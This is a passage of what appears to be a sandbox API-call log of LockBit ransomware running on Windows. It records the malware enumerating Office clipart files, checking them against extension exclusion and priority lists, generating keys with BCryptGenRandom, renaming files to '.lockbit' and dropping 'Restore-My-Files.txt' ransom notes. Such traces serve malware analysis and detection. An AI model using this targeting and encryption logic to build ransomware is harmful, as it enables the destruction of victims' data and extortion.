NumberOfConcurrentThreads=0x0) returned 0x14c [0118.751] malloc (_Size=0x40068) returned 0x1ff1e60 [0118.751] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1158) returned 1 [0118.751] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.752] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.752] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0118.752] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.752] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.752] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0118.752] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.755] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.755] malloc (_Size=0xa6) returned 0x77d7a8 [0118.755] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.756] free (_Block=0x77d7a8) [0118.756] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00046_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.756] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.756] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.756] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20f3db00, ftCreationTime.dwHighDateTime=0x1bd4b24, ftLastAccessTime.dwLowDateTime=0x5392d770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x20f3db00, ftLastWriteTime.dwHighDateTime=0x1bd4b24, nFileSizeHigh=0x0, nFileSizeLow=0x318, dwReserved0=0x0, dwReserved1=0x0, cFileName="IN00118_.WMF", cAlternateFileName="")) returned 1 [0118.756] lstrcmpiW (lpString1=".", lpString2="IN00118_.WMF") returned -1 [0118.756] lstrcmpiW (lpString1="..", lpString2="IN00118_.WMF") returned -1 [0118.756] PathFindExtensionW (pszPath="IN00118_.WMF") returned=".WMF" [0118.756] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.756] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.757] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.757] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.757] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.757] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.757] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.757] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.757] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.757] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.757] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.757] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.757] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.757] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.757] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.757] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.757] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.757] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.757] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.757] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.757] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.757] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.757] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.757] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.758] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.758] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.758] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.758] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.758] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.758] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.758] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.758] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.758] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.758] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.758] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.758] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.758] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.758] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.758] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.758] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.758] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.758] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.758] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.758] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.758] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.758] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.759] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.759] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="IN00118_.WMF") returned 1 [0118.759] lstrcmpiW (lpString1="ntldr", lpString2="IN00118_.WMF") returned 1 [0118.759] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="IN00118_.WMF") returned 1 [0118.759] lstrcmpiW (lpString1="bootsect.bak", lpString2="IN00118_.WMF") returned -1 [0118.759] lstrcmpiW (lpString1="autorun.inf", lpString2="IN00118_.WMF") returned -1 [0118.759] lstrcmpiW (lpString1="thumbs.db", lpString2="IN00118_.WMF") returned 1 [0118.759] lstrcmpiW (lpString1="iconcache.db", lpString2="IN00118_.WMF") returned -1 [0118.759] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.759] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF") returned=".WMF" [0118.759] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.759] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.759] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.759] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.759] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.759] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.759] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.759] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.759] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.759] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.759] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.759] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.760] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.760] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.760] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.760] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.760] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.760] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.760] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.760] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.760] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.760] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.760] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.760] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.760] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.760] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.760] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.760] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.760] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF.lockbit") returned 72 [0118.760] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00118_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0118.790] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.790] malloc (_Size=0x40068) returned 0x3df0008 [0118.790] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=792) returned 1 [0118.790] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.791] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.791] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0118.791] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.792] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0118.792] ReadFile (in: hFile=0x3bc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0118.819] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.819] malloc (_Size=0xa6) returned 0x77d7a8 [0118.820] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.821] free (_Block=0x77d7a8) [0118.821] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00118_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.821] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.821] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.821] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x146a8500, ftCreationTime.dwHighDateTime=0x1bd4b1a, ftLastAccessTime.dwLowDateTime=0x61cccf30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x146a8500, ftLastWriteTime.dwHighDateTime=0x1bd4b1a, nFileSizeHigh=0x0, nFileSizeLow=0x432, dwReserved0=0x0, dwReserved1=0x0, cFileName="IN00177_.WMF", cAlternateFileName="")) returned 1 [0118.821] lstrcmpiW (lpString1=".", lpString2="IN00177_.WMF") returned -1 [0118.821] lstrcmpiW (lpString1="..", lpString2="IN00177_.WMF") returned -1 [0118.821] PathFindExtensionW (pszPath="IN00177_.WMF") returned=".WMF" [0118.821] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.821] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.821] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.821] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.821] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.821] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.821] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.822] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.822] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.822] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.822] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.822] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.822] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.822] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.822] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.822] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.822] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.822] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.822] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.822] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.822] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.822] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.822] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.822] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.822] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.822] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.822] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.822] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.822] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.822] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.823] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.823] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.823] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.823] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.823] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.823] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.823] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.823] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.823] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.823] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.823] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.823] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.823] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.823] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.823] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.823] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.823] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.823] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="IN00177_.WMF") returned 1 [0118.823] lstrcmpiW (lpString1="ntldr", lpString2="IN00177_.WMF") returned 1 [0118.823] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="IN00177_.WMF") returned 1 [0118.823] lstrcmpiW (lpString1="bootsect.bak", lpString2="IN00177_.WMF") returned -1 [0118.823] lstrcmpiW (lpString1="autorun.inf", lpString2="IN00177_.WMF") returned -1 [0118.824] lstrcmpiW (lpString1="thumbs.db", lpString2="IN00177_.WMF") returned 1 [0118.824] lstrcmpiW (lpString1="iconcache.db", lpString2="IN00177_.WMF") returned -1 [0118.824] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.824] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF") returned=".WMF" [0118.824] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.824] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.824] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.824] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.824] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.824] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.824] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.824] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.824] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.824] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.824] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.824] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.824] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.824] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.824] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.824] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.824] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.824] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.824] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.825] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.825] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.825] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.825] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.825] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.825] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.825] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.825] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.825] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.825] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF.lockbit") returned 72 [0118.825] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00177_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0118.826] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.826] malloc (_Size=0x40068) returned 0x1ff1e60 [0118.826] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1074) returned 1 [0118.826] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.827] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0118.827] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.828] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0118.828] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.832] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.832] malloc (_Size=0xa6) returned 0x77d7a8 [0118.832] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.833] free (_Block=0x77d7a8) [0118.833] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00177_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.833] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.833] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.833] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eef900, ftCreationTime.dwHighDateTime=0x1bd4b35, ftLastAccessTime.dwLowDateTime=0x61cf3090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x37eef900, ftLastWriteTime.dwHighDateTime=0x1bd4b35, nFileSizeHigh=0x0, nFileSizeLow=0x738, dwReserved0=0x0, dwReserved1=0x0, cFileName="IN00204_.WMF", cAlternateFileName="")) returned 1 [0118.833] lstrcmpiW (lpString1=".", lpString2="IN00204_.WMF") returned -1 [0118.833] lstrcmpiW (lpString1="..", lpString2="IN00204_.WMF") returned -1 [0118.833] PathFindExtensionW (pszPath="IN00204_.WMF") returned=".WMF" [0118.833] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.833] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.834] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.834] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.834] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.834] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.834] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.834] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.834] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.834] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.834] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.834] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.834] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.834] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.834] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.834] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.834] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.834] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.834] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.834] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.834] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.834] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.834] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.834] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.835] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.835] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.835] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.835] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.835] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.835] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.835] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.835] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.835] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.835] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.835] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.835] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.835] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.835] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.835] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.835] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.835] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.835] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.835] lstrcmpiW 